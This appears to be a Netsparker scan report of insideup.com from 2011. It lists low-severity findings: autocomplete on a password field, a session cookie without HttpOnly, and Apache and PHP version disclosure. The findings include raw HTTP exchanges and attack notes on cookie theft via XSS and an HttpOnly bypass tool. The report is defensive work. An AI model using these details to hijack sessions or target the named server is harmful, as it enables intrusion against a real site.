</div> <!--Mid Container Start's Here--> <!--Footer End's Here--> <div id="footer"> <!-- put footer section here--> <!--Footer Starts--> <div id="footerLinkBlock"> <a class="footerl" href="/index.html"> Home</a> | <a class="footerl" href="/advertise.html">Advertise</a> | <a class="footerl" href="/partner.html"> Partner</a> | <a class="footerl" href="/aboutUs.html"> About Us</a> | <a class="footerl" href="/communitymainpage.html"> Resources</a> | <a class="footerl" href="/contactUs.html">Contact Us</a> | <a href="/privacy.html" class="footerl">Privacy Policy</a> | <a href="/cityLinks.html" class="footerl">Metro Search</a><br /><br /> © Copyright 2011 InsideUp, Inc. All Rights Reserved.<br /><br /> </div> <script type="text/javascript" language="javascript">llactid=18615</script> <script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script> <!--Footer ends--><div id="errorPopUpLayerBody" style="display:none;position:absolute; Z-INDEX: 9999; LEFT: 27%; *left:15%; WIDTH: 410px; POSITION: absolute; TOP: 25%; *TOP: 18%"> <div id="popUpMain"> <div id="popUpTop"> <div id="errorTitle"> <div id="popUpTitle" class="commBlackTxt"><span id="messageId">An error has occurred:</span></div> <div id="popClose"><a href="#" onclick="closeLogin('errorPopUpLayerBody')"><img src="/images/popUpCloseBtn.gif" alt="Close" border="0" /></a></div> </div> </div> <div id="popUpMid"> <div id="popMidTextContainer"> <div id="popMidText3"> <div id="errorData"></div> </div> </div> </div> <div id="popUpBot"></div> </div></div><div id="loginlayer" style="display:none;position:absolute; Z-INDEX: 9999; LEFT: 22%; WIDTH: 410px; POSITION: absolute; TOP: 32%" ></div> <div id="trans"></div> </div> <!--Footer End's Here--> </div></body></html>
Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all inputs that store private data and disable autocomplete on them. Fields that contain data such as "Credit Card" or "CCV" values should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy, and a number of automated tools exist to do this. Where the attacker cannot dump the data, he or she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

- /selectvendors.html

/selectvendors.html CONFIRMED

http://www.insideup.com/selectvendors.html

Identified Field Name

password

Request

GET /selectvendors.html HTTP/1.1
Referer: http://www.insideup.com/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Select Vendor',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" 
onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_1" style="margin-top:6px;"> <div> <div class="vendorCategoriesContanier" style="height: 210px;"> <h1 style="background-color:#f2f2f2;font-size:16px;"> Save Up to 60% on Services for Your Business <br/> <span style="font-size:14px;color:#f16913">Select Category to Get Free, No Obligation Quotes from Vendor</span> </h1> <ul class="vendorCategoriesBody"> <li><a href="http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc" title="Web Site Design" target="_new">Web Site Design</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc" title="Business Phone Systems" target="_new">Business Phone Systems</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc" title="Logo Design" target="_new">Logo Design</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc" title="Credit Card Processing" target="_new">Credit Card Processing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc" title="Incorporation" target="_new">Incorporation</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc" title="Business Loans" target="_new">Business Loans</a></li> 
<li><a href="http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc" title="Outbound Telemarketing" target="_new">Outbound Telemarketing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc" title="Payroll Services" target="_new">Payroll Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc" title="Long Distance Services" target="_new">Long Distance Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc" title="Direct Mail Services" target="_new">Direct Mail Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc" title="Business Cash Advance" target="_new">Business Cash Advance</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/onad00/project.php?catId=80003&iusrc=iupsc" title="Internet Marketing Services" target="_new">Internet Marketing Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/weho00/project.php?catId=20003&iusrc=iupsc" title="Web Hosting" target="_new">Web Hosting</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc" title="Health Insurance" target="_new">Health Insurance</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc" title="Call Center Services" target="_new">Call Center Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc" title="Internet Access" target="_new">Internet Access</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/resf00/project.php?catId=40001&iusrc=iupsc" title="HR Outsourcing" target="_new">HR Outsourcing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc" title="Collection Agencies" target="_new">Collection Agencies</a></li> <li><a 
href="http://www.insideup.com/ppc/leadflow/voip00/project.php?catId=110005&iusrc=iupsc" title="Business VoIP" target="_new">Business VoIP</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc" title="Accounting and Bookkeeping" target="_new">Accounting and Bookkeeping</a></li> <br class="clear" /> </ul> </div> </div> <div style="margin-top:20px;"><img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map"> <map name="Map"> <area shape="rect" coords="1,-1,185,65" href="https://twitter.com/VendorSourcing" target="_blank"> <area shape="rect" coords="197,1,381,63" href="http://www.youtube.com/insideupvendors" target="_blank"> <area shape="rect" coords="390,2,578,64" href="http://insideup.com/blogs/b2bsourcing" target="_blank"> </map> </div> <div class="clear"></div> <div class="grid_2" style="margin-left:0px;margin-top:20px;"> <a href="http://itunes.apple.com/app/insideup-vendor-quotes/id381971606?mt=8#i" target="_new"><img src="/images/iPhone-Banner.jpg"></a> </div> <div class="grid_3" style="margin-top:20px;"> <div class="vendorArticle"> <iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FInsi..
Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts, so marking a cookie as HTTPOnly provides an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker can read the cookie through document.cookie and hijack the victim's session; here the affected cookie is the JSESSIONID session identifier.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after this change, JavaScript code will no longer be able to read them).

Remedy

Mark the cookie as HTTPOnly. This is an extra layer of defence against XSS, not a silver bullet: it stops a script from reading the cookie value, but it does not protect the application against Cross-site Scripting itself. An attacker can still drive requests through the victim's browser with a tool such as XSS Tunnel, bypassing the HTTPOnly protection entirely.

- /index.html

/index.html CONFIRMED

http://www.insideup.com/index.html

Identified Cookie

JSESSIONID

Request

GET /index.html HTTP/1.1
Referer: http://www.insideup.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:14 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5; Path=/
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search"/> <meta name="description" content="InsideUp: Only the best business services."/> <meta name="robots" content="index; follow"/> <meta name="google-site-verification" content="lFftEaTI4_fI8Hgn8kmfZ7dyxFFymwxze9qghpcHBSs" /> <title>Research and choose the best business services and take your company to the next level.</title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El 
Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('InsideUp Home',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_1" style="margin-top:6px;"> <div> <!--/* OpenX Javascript Tag v2.8.7 */--><!--/* * The backup image section of this tag has been generated for use on a * non-SSL page. 
If this tag is to be placed on an SSL page, change the * 'http://www.insideup.com/openx/www/delivery/...' * to * 'https://www.insideup.com/openx/www/delivery/...' * * This noscript section of this tag only shows image banners. There * is no width or height in these banners, so if you want these tags to * allocate space for the ad before it shows, you will need to add this * information to the <img> tag. * * If you do not want to deal with the intricities of the noscript * section, delete the tag (from <noscript>... to </noscript>). On * average, the noscript tag is called from less than 1% of internet * users. */--><script type='text/javascript'><!--//<![CDATA[ var m3_u = (location.protocol=='https:'?'https://www.insideup.com/openx/www/delivery/ajs.php':'http://www.insideup.com/openx/www/delivery/ajs.php'); var m3_r = Math.floor(Math.random()*99999999999); if (!document.MAX_used) document.MAX_used = ','; document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u); document.write ("?zoneid=2"); document.write ('&amp;cb=' + m3_r); if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used); document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? 
'&amp;charset='+document.characterSet : '')); document.write ("&amp;loc=" + escape(window.location)); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); if (document.context) document.write ("&context=" + escape(document.context)); if (document.mmm_fo) document.write ("&amp;mmm_fo=1"); document.write ("'><\/scr"+"ipt>");//]]>--></script><noscript><a href='http://www.insideup.com/openx/www/delivery/ck.php?n=a08b960a&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://www.insideup.com/openx/www/delivery/avw.php?zoneid=2&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a08b960a' border='0' alt='' /></a></noscript> </div> <div style="margin-top:20px;"> <!--/* OpenX Javascript Tag v2.8.7 */--><!--/* * The backup image section of this tag has been generated for use on a * non-SSL page. If this tag is to be placed on an SSL page, change the * 'http://www.insideup.com/openx/www/delivery/...' * to * 'https://www.insideup.com/openx/www/delivery/...' * * This noscript section of this tag only shows image banners. There * is no width or height in these banners, so if you want these tags to * allocate space for the ad before it shows, you will need to add this * information to the <img> tag. * * If you do not want to deal with the intricities of the noscript * section, delete the tag (from <noscript>... to </noscript>). On * average, the noscript tag is called from less than 1% of internet * users. */--><script type='text/javascript'><!--//<![CDATA[ var m3_u = (location.protocol=='https:'?'https://www.insideup.com/openx/www/delivery/ajs.php':'http://www.insideup.com/openx/www/delivery/ajs.php'); var m3_r = Math.floor(Math.random()*99999999999); if (!document.MAX_used) document.MAX_used = ','; document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u); document.write ("?zoneid=3"); document.write ('&amp;cb=' + m3_r); if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used); document.write (document.charset ? 
'&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : '')); document.write ("&amp;loc=" + escape(window.location)); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); if (document.context) document.write ("&context=" + escape(document.context)); if (document.mmm_fo) document.write ("&amp;mmm_fo=1"); document.write ("'><\/scr"+"ipt>");//]]>--></script><noscript><a href='http://www.insideup.com/openx/www/delivery/ck.php?n=a750dce4&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://www.insideup.com/openx/www/delivery/avw.php?zoneid=3&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a750dce4' border='0' alt='' /></a></noscript> <a href="http://insideup.com/blogs/b2bleadgen/"><img src="/images/new_blog.jpg"></a> </div> <div class="clear"></div> <div class="grid_2" style="margin-left:0px;margin-top:20px;"> <!--/* OpenX Javascript Tag v2.8.7 */--><!--/* * The backup image section of this tag has been generated for use on a * non-SSL page. If this tag is to be placed on an SSL page, change the * 'http://www.insideup.com/openx/www/delivery/...' * to * 'https://www.insideup.com/openx/www/delivery/...' * * This noscript section of this tag only shows image banners. There * is no width or height in these banners, so if you want these tags to * allocate space for the ad before it shows, you will need to add this * information to the <img> tag. * * If you do not want to deal with the intricities of the noscript * section, delete the tag (from <noscript>... to </noscript>). On * average, the noscript tag is called from less than 1% of internet * users. */--><!--/* OpenX Javascript Tag v2.8.7 */--><!--/* * The backup image section of this tag has been generated for use on a * non-SSL page. If this tag..
Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. The product and version (2.2.9 on Fedora) were disclosed through the Server header of the HTTP response and repeated in the footer of the Apache-generated error page. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response. The same version string also appears in the <address> footer of Apache's own error pages (see the 302 response below), so that signature needs to be disabled as well.
- /

/

http://www.insideup.com/

Extracted Version

2.2.9 (Fedora)

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Wed, 20 Apr 2011 02:15:14 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://www.insideup.com/index.html
Content-Length: 299
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.insideup.com/index.html">here</a>.</p><hr><address>Apache/2.2.9 (Fedora) Server at www.insideup.com Port 80</address></body></html>
PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified, and can combine this information with other vulnerabilities in the application or the web server.
